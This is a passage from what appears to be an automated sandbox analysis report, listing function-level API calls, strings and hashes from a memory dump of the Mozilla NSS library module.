Instruction Fuzzy Hash: 0B21E775A012199FDB109F28DD8879A77A8EF45358F148139ED099BA41D730EC14CBF2

Function 6C73EE30 Relevance: 9.1, APIs: 6, Instructions: 81memoryCOMMON

Download Yara Rule

APIs

SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C73EE49

Part of subcall function 6C75FAB0: free.MOZGLUE(?,-00000001,?,?,6C6FF673,00000000,00000000), ref: 6C75FAC7

SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6C73EE5C
PK11_CreateContextBySymKey.NSS3(?,00000104,?,?), ref: 6C73EE77
PK11_CipherOp.NSS3(00000000,?,00000008,?,?,?), ref: 6C73EE9D
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C73EEB3

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: K11_$ContextItem_Util$AllocCipherCreateDestroyZfreefree
String ID:
API String ID: 886189093-0
Opcode ID: c406ce7318dedb9b6bcb4b4cacb5e4229fd26394528e3ac5a67ff4d0476811dc
Instruction ID: 3086a868d171cc1ad9b8b645f6a8b97d1f17debb2452f626c4027a4da019540c
Opcode Fuzzy Hash: c406ce7318dedb9b6bcb4b4cacb5e4229fd26394528e3ac5a67ff4d0476811dc
Instruction Fuzzy Hash: 6121C6BAA402246BFB118A14DD89EAB77ACEB45708F040174FD089B342EB71DC1487E1

Function 6C754820 Relevance: 9.1, APIs: 6, Instructions: 74stringCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE09A,00000000,00000000,-00000001,00000000,?,6C754EB8,?), ref: 6C754884

Part of subcall function 6C758800: TlsGetValue.KERNEL32(?,6C76085A,00000000,?,6C708369,?), ref: 6C758821
Part of subcall function 6C758800: TlsGetValue.KERNEL32(?,?,6C76085A,00000000,?,6C708369,?), ref: 6C75883D
Part of subcall function 6C758800: EnterCriticalSection.KERNEL32(?,?,?,6C76085A,00000000,?,6C708369,?), ref: 6C758856
Part of subcall function 6C758800: PR_WaitCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000013,?), ref: 6C758887
Part of subcall function 6C758800: PR_Unlock.NSS3(?,?,?,?,6C76085A,00000000,?,6C708369,?), ref: 6C758899

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C754EB8,?,?,?,?,?,?,?,?,?,?,6C7178F8), ref: 6C75484C
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C754EB8,?,?,?,?,?,?,?,?,?,?,6C7178F8), ref: 6C75486D
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,6C7178F8), ref: 6C754899
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7548A9
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7548B8

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: Value$CriticalEnterSectionUnlockstrcmp$CondErrorWait
String ID:
API String ID: 2226052791-0
Opcode ID: 09acbedaa45d71d71867c8567354719200cee2f311c40a3a540f495d04856dbb
Instruction ID: e52694f06c437d4f54bb276ff8e1e5be0941f8ba2625ecc520c026803a96b234
Opcode Fuzzy Hash: 09acbedaa45d71d71867c8567354719200cee2f311c40a3a540f495d04856dbb
Instruction Fuzzy Hash: C621C576F002419BEF205FA6DE8856677B9AB0635D7440574DA094BA02EF31F834D7E1

Function 6C793C80 Relevance: 9.1, APIs: 6, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 6C795B40: PR_GetIdentitiesLayer.NSS3 ref: 6C795B56

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C793D3F

Part of subcall function 6C70BA90: PORT_NewArena_Util.NSS3(00000800,6C793CAF,?), ref: 6C70BABF
Part of subcall function 6C70BA90: PORT_ArenaAlloc_Util.NSS3(00000000,00000010,?,6C793CAF,?), ref: 6C70BAD5
Part of subcall function 6C70BA90: PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,?,6C793CAF,?), ref: 6C70BB08
Part of subcall function 6C70BA90: memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,6C793CAF,?), ref: 6C70BB1A
Part of subcall function 6C70BA90: SECITEM_CopyItem_Util.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,6C793CAF,?), ref: 6C70BB3B

PR_EnterMonitor.NSS3(?), ref: 6C793CCB

Part of subcall function 6C7C9090: TlsGetValue.KERNEL32 ref: 6C7C90AB
Part of subcall function 6C7C9090: TlsGetValue.KERNEL32 ref: 6C7C90C9
Part of subcall function 6C7C9090: EnterCriticalSection.KERNEL32 ref: 6C7C90E5
Part of subcall function 6C7C9090: TlsGetValue.KERNEL32 ref: 6C7C9116
Part of subcall function 6C7C9090: LeaveCriticalSection.KERNEL32 ref: 6C7C913F

PR_EnterMonitor.NSS3(?), ref: 6C793CE2
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C793CF8
PR_ExitMonitor.NSS3(?), ref: 6C793D15
PR_ExitMonitor.NSS3(?), ref: 6C793D2E

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: Util$Monitor$EnterValue$Alloc_ArenaArena_CriticalExitSection$CopyErrorFreeIdentitiesItem_LayerLeavememset
String ID:
API String ID: 4030862364-0
Opcode ID: e7ad2b172ce1ebdb6267d86afec6fc76fe1798d5b7f323bf4e9ea9a967b6582e
Instruction ID: eb3d66c16ff560bc952150f95b0a9d8406aa99f31ee5bc8aad498a7aa86347b0
Opcode Fuzzy Hash: e7ad2b172ce1ebdb6267d86afec6fc76fe1798d5b7f323bf4e9ea9a967b6582e
Instruction Fuzzy Hash: 3B11E2B5A10600AFF7205A65FE8AB9BB2E4AB1130DF504534E41E8BB61E632E919C653

Function 6C7189E0 Relevance: 9.1, APIs: 6, Instructions: 64COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,-00000008,00000000,?,?,6C7188AE,-00000008), ref: 6C718A04
EnterCriticalSection.KERNEL32(?), ref: 6C718A15
memset.VCRUNTIME140(6C7188AE,00000000,00000132), ref: 6C718A27
PR_Unlock.NSS3(?), ref: 6C718A35
memset.VCRUNTIME140(6C7188AE,00000000,00000132,00000000,-00000008,00000000,?,?,6C7188AE,-00000008), ref: 6C718A45
free.MOZGLUE(6C7188A6,?,6C7188AE,-00000008), ref: 6C718A4E

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: memset$CriticalEnterSectionUnlockValuefree
String ID:
API String ID: 65992600-0
Opcode ID: 44218d444d909a1358435a36c047e6c5458909e3a5351a291c64e1874cbfaf9a
Instruction ID: 3ec47758bca99242cbda2e1443bd2c6dc3e7fc4e1b7c07802b82717267ef11bb
Opcode Fuzzy Hash: 44218d444d909a1358435a36c047e6c5458909e3a5351a291c64e1874cbfaf9a
Instruction Fuzzy Hash: 74112BB5E043019FEB109F68DD89A9ABBB8FF05318F190532E91497E01E731E555CBE1

Function 6C818910 Relevance: 9.1, APIs: 6, Instructions: 55threadCOMMON

Download Yara Rule

APIs

PR_GetCurrentThread.NSS3 ref: 6C81892E

Part of subcall function 6C6F0F00: PR_GetPageSize.NSS3(6C6F0936,FFFFE8AE,?,6C6816B7,00000000,?,6C6F0936,00000000,?,6C68204A), ref: 6C6F0F1B
Part of subcall function 6C6F0F00: PR_NewLogModule.NSS3(clock,6C6F0936,FFFFE8AE,?,6C6816B7,00000000,?,6C6F0936,00000000,?,6C68204A), ref: 6C6F0F25

PR_Lock.NSS3 ref: 6C818950

Part of subcall function 6C7C9BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6C6F1A48), ref: 6C7C9BB3
Part of subcall function 6C7C9BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6C6F1A48), ref: 6C7C9BC8

getprotobynumber.WSOCK32(?), ref: 6C818959
GetLastError.KERNEL32(?), ref: 6C818967
PR_GetCurrentThread.NSS3(?,?), ref: 6C81896F
PR_Unlock.NSS3(?,?), ref: 6C81898A

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: CurrentThread$CriticalEnterErrorLastLockModulePageSectionSizeUnlockValuegetprotobynumber
String ID:
API String ID: 4143355744-0
Opcode ID: 73cb86e1bc9d01a60275f291c3dcf49f26f7061197ceb4e7fbbe571628c5602d
Instruction ID: 38c30191763dfcac13f27d0b41eeee49a4a5c20713b0af5317c324241d472718
Opcode Fuzzy Hash: 73cb86e1bc9d01a60275f291c3dcf49f26f7061197ceb4e7fbbe571628c5602d
Instruction Fuzzy Hash: EF110676A180219FCB205F79AA0954A37A4AF46338F0607B6DC0597F61D7309C04CBC6

Function 6C80FD90 Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

PR_Lock.NSS3 ref: 6C80FD9E

Part of subcall function 6C7C9BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6C6F1A48), ref: 6C7C9BB3
Part of subcall function 6C7C9BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6C6F1A48), ref: 6C7C9BC8

PR_WaitCondVar.NSS3(000000FF), ref: 6C80FDB9

Part of subcall function 6C6EA900: TlsGetValue.KERNEL32(00000000,?,6C8614E4,?,6C684DD9), ref: 6C6EA90F
Part of subcall function 6C6EA900: _PR_MD_WAIT_CV.NSS3(?,?,?), ref: 6C6EA94F

PR_Unlock.NSS3 ref: 6C80FDD4
PR_Lock.NSS3 ref: 6C80FDF2
PR_NotifyAllCondVar.NSS3 ref: 6C80FE0D
PR_Unlock.NSS3 ref: 6C80FE23

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: CondLockUnlockValue$CriticalEnterNotifySectionWait
String ID:
API String ID: 3365241057-0
Opcode ID: 6f8a52d335418de6fc89113cd132bc7bed251e048130b022acf70e3fa59c141d
Instruction ID: eaa54d5b863c20afa3551d550dea2b2534dfb591bfcdfff414a3d8b64278615f
Opcode Fuzzy Hash: 6f8a52d335418de6fc89113cd132bc7bed251e048130b022acf70e3fa59c141d
Instruction Fuzzy Hash: A10182B6A04201AFDF254E16FD048527632BB2236C7154775E82547BA2EB22DD28C6C6

Function 6C796840 Relevance: 9.0, APIs: 6, Instructions: 45COMMON

Download Yara Rule

APIs

PR_NewMonitor.NSS3(00000000,?,6C79AA9B,?,?,?,?,?,?,?,00000000,?,6C7980C1), ref: 6C796846

Part of subcall function 6C6F1770: calloc.MOZGLUE(00000001,0000019C,?,6C6F15C2,?,?,?,?,?,00000001,00000040), ref: 6C6F178D

PR_NewMonitor.NSS3(00000000,?,6C79AA9B,?,?,?,?,?,?,?,00000000,?,6C7980C1), ref: 6C796855

Part of subcall function 6C758680: calloc.MOZGLUE(00000001,00000028,00000000,-00000001,?,00000000,?,6C7055D0,00000000,00000000), ref: 6C75868B
Part of subcall function 6C758680: PR_NewLock.NSS3(00000000,00000000), ref: 6C7586A0
Part of subcall function 6C758680: PR_NewCondVar.NSS3(00000000,00000000,00000000), ref: 6C7586B2
Part of subcall function 6C758680: PR_NewCondVar.NSS3(00000000,?,00000000,00000000), ref: 6C7586C8
Part of subcall function 6C758680: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00000000,00000000), ref: 6C7586E2
Part of subcall function 6C758680: malloc.MOZGLUE(00000001,?,?,?,00000000,00000000), ref: 6C7586EC
Part of subcall function 6C758680: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,00000000,00000000), ref: 6C758700

PR_NewMonitor.NSS3(?,6C79AA9B,?,?,?,?,?,?,?,00000000,?,6C7980C1), ref: 6C79687D

Part of subcall function 6C6F1770: PR_SetError.NSS3(FFFFE890,00000000,?,?,?,?,?,?,?,?,?,00000001,00000040), ref: 6C6F18DE
Part of subcall function 6C6F1770: InitializeCriticalSectionAndSpinCount.KERNEL32(00000020,000005DC,?,?,?,?,?,?,?,?,?,00000001,00000040), ref: 6C6F18F1

PR_NewMonitor.NSS3(?,6C79AA9B,?,?,?,?,?,?,?,00000000,?,6C7980C1), ref: 6C79688C

Part of subcall function 6C6F1770: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000040), ref: 6C6F18FC
Part of subcall function 6C6F1770: free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,00000001,00000040), ref: 6C6F198A

PR_NewLock.NSS3 ref: 6C7968A5

Part of subcall function 6C7C98D0: calloc.MOZGLUE(00000001,00000084,6C6F0936,00000001,?,6C6F102C), ref: 6C7C98E5

PR_NewLock.NSS3 ref: 6C7968B4

Part of subcall function 6C7C98D0: InitializeCriticalSectionAndSpinCount.KERNEL32(0000001C,000005DC), ref: 6C7C9946
Part of subcall function 6C7C98D0: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C6816B7,00000000), ref: 6C7C994E
Part of subcall function 6C7C98D0: free.MOZGLUE(00000000), ref: 6C7C995E

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: Monitor$ErrorLockcalloc$CondCountCriticalInitializeLastSectionSpinfree$mallocstrcpystrlen
String ID:
API String ID: 200661885-0
Opcode ID: 289164870b0241f1459d04b869d0ad02f02522978031b45694acd8a1dd060f96
Instruction ID: 3082046d213b8f1c21a40f0092014875f7e4b36947ce9dddf442f51333ca442c
Opcode Fuzzy Hash: 289164870b0241f1459d04b869d0ad02f02522978031b45694acd8a1dd060f96
Instruction Fuzzy Hash: 6B01FBB1A01F0746E7916F766A147E776E59F0238CF10063A846DC6A80EF65E5088BE5

Function 6C6EAE30 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 231COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CDD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C6EAFDA

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C6EAFC4
misuse, xrefs: 6C6EAFCE
unable to delete/modify collation sequence due to active statements, xrefs: 6C6EAF5C
%s at line %d of [%.10s], xrefs: 6C6EAFD3

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$misuse$unable to delete/modify collation sequence due to active statements
API String ID: 632333372-924978290
Opcode ID: afb8403d4f40ff72dfca35753e2119a4b8c9f3f45b1215c070269c65179e720d
Instruction ID: dc54658fbb1fd157ae38d6203d31755852c87cc853a1950ee311fc746f70b8e4
Opcode Fuzzy Hash: afb8403d4f40ff72dfca35753e2119a4b8c9f3f45b1215c070269c65179e720d
Instruction Fuzzy Hash: 2391F675B0A2158FDB14CF59C850BAABBF1BF89314F1945A9E855AB752C330EC01CBA8

Function 6C74FC30 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 156stringCOMMON

Download Yara Rule

APIs

PL_strncasecmp.NSS3(?,pkcs11:,00000007), ref: 6C74FC55
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C74FCB2
PR_SetError.NSS3(FFFFE040,00000000), ref: 6C74FDB7
PR_SetError.NSS3(FFFFE09A,00000000), ref: 6C74FDDE

Part of subcall function 6C758800: TlsGetValue.KERNEL32(?,6C76085A,00000000,?,6C708369,?), ref: 6C758821
Part of subcall function 6C758800: TlsGetValue.KERNEL32(?,?,6C76085A,00000000,?,6C708369,?), ref: 6C75883D
Part of subcall function 6C758800: EnterCriticalSection.KERNEL32(?,?,?,6C76085A,00000000,?,6C708369,?), ref: 6C758856
Part of subcall function 6C758800: PR_WaitCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000013,?), ref: 6C758887
Part of subcall function 6C758800: PR_Unlock.NSS3(?,?,?,?,6C76085A,00000000,?,6C708369,?), ref: 6C758899

Strings

pkcs11:, xrefs: 6C74FC4F

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: ErrorValue$CondCriticalEnterL_strncasecmpSectionUnlockWaitstrcmp
String ID: pkcs11:
API String ID: 362709927-2446828420
Opcode ID: 2b9d3280f9eea6518793e466ca9a1f5c50d1d11e797385f9778b879fc91a7f42
Instruction ID: 9acd59750a28840407b7a6501f01514909edeba5a911184926c5cc3db70710bb
Opcode Fuzzy Hash: 2b9d3280f9eea6518793e466ca9a1f5c50d1d11e797385f9778b879fc91a7f42
Instruction Fuzzy Hash: F451F0B1A40211ABEB108F699F4AFAA3365AF4135CF548075DD146BB81EB30E814CFA2

Function 6C7149C0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 97COMMON

Download Yara Rule

APIs

Part of subcall function 6C714860: SEC_QuickDERDecodeItem_Util.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C714894

PR_SetError.NSS3(FFFFE006,00000000,?,?,?,?,?,6C716361,?,?,?), ref: 6C714A8F
PR_SetError.NSS3(FFFFE006,00000000,?,?,?,?,?,6C716361,?,?,?), ref: 6C714AD0

Strings

acql, xrefs: 6C7149FB
^jql, xrefs: 6C7149C5
acql, xrefs: 6C714AB4

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: Error$DecodeItem_QuickUtil
String ID: ^jql$acql$acql
API String ID: 1982233058-86974066
Opcode ID: 7a05cc8cb336127f382d16b8d6244bd81aaf7faa09e3a51b896743ee76c031a6
Instruction ID: 04fdb02b3a1ccbf7352719fd65993793af9078765fc2c5f06965d44286fb7e2b
Opcode Fuzzy Hash: 7a05cc8cb336127f382d16b8d6244bd81aaf7faa09e3a51b896743ee76c031a6
Instruction Fuzzy Hash: AC312C31A0C10697FB108A48EE94B6E72A5F78131CF2E463AD515F7FC0C6349941D7DA

Function 6C7AA8F0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81COMMON

Download Yara Rule

APIs

PK11_FreeSymKey.NSS3(?,00000000,00000000,?,?,6C792AE9,00000000,0000065C), ref: 6C7AA91D

Part of subcall function 6C74ADC0: TlsGetValue.KERNEL32(?,6C72CDBB,?,6C72D079,00000000,00000001), ref: 6C74AE10
Part of subcall function 6C74ADC0: EnterCriticalSection.KERNEL32(?,?,6C72CDBB,?,6C72D079,00000000,00000001), ref: 6C74AE24
Part of subcall function 6C74ADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6C72D079,00000000,00000001), ref: 6C74AE5A
Part of subcall function 6C74ADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C72CDBB,?,6C72D079,00000000,00000001), ref: 6C74AE6F
Part of subcall function 6C74ADC0: free.MOZGLUE(85145F8B,?,?,?,?,6C72CDBB,?,6C72D079,00000000,00000001), ref: 6C74AE7F
Part of subcall function 6C74ADC0: TlsGetValue.KERNEL32(?,6C72CDBB,?,6C72D079,00000000,00000001), ref: 6C74AEB1
Part of subcall function 6C74ADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C72CDBB,?,6C72D079,00000000,00000001), ref: 6C74AEC9

PK11_FreeSymKey.NSS3(?,00000000,00000000,?,?,6C792AE9,00000000,0000065C), ref: 6C7AA934
SECITEM_ZfreeItem_Util.NSS3(?,00000000,00000000,00000000,?,?,6C792AE9,00000000,0000065C), ref: 6C7AA949
free.MOZGLUE(?,00000000,0000065C), ref: 6C7AA952

Strings

*yl, xrefs: 6C7AA8F6

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: CriticalEnterFreeK11_SectionValuefree$Item_UnlockUtilZfreememset
String ID: *yl
API String ID: 1595327144-2759601548
Opcode ID: a6ef689613821b78b957446ef5fc7824b489bbceb40a5270339c68e41813179b
Instruction ID: 0de6f5714cf0bffe92f4d17d048156e8bd134022f74f7cc728264c0016113f4e
Opcode Fuzzy Hash: a6ef689613821b78b957446ef5fc7824b489bbceb40a5270339c68e41813179b
Instruction Fuzzy Hash: 46314DB46012019FD704CF54DA84E62BBE8FF48328F1582A9E8098F756E730ED15CFA1

Function 6C7DA800 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 65COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000001,?,?,?,?,?,?,?,?,6C6A7915,?,?), ref: 6C7DA86D
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010800,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,?,?,?,?,?,?,?,6C6A7915,?,?), ref: 6C7DA8A6

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C7DA891
database corruption, xrefs: 6C7DA89B
%s at line %d of [%.10s], xrefs: 6C7DA8A0

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
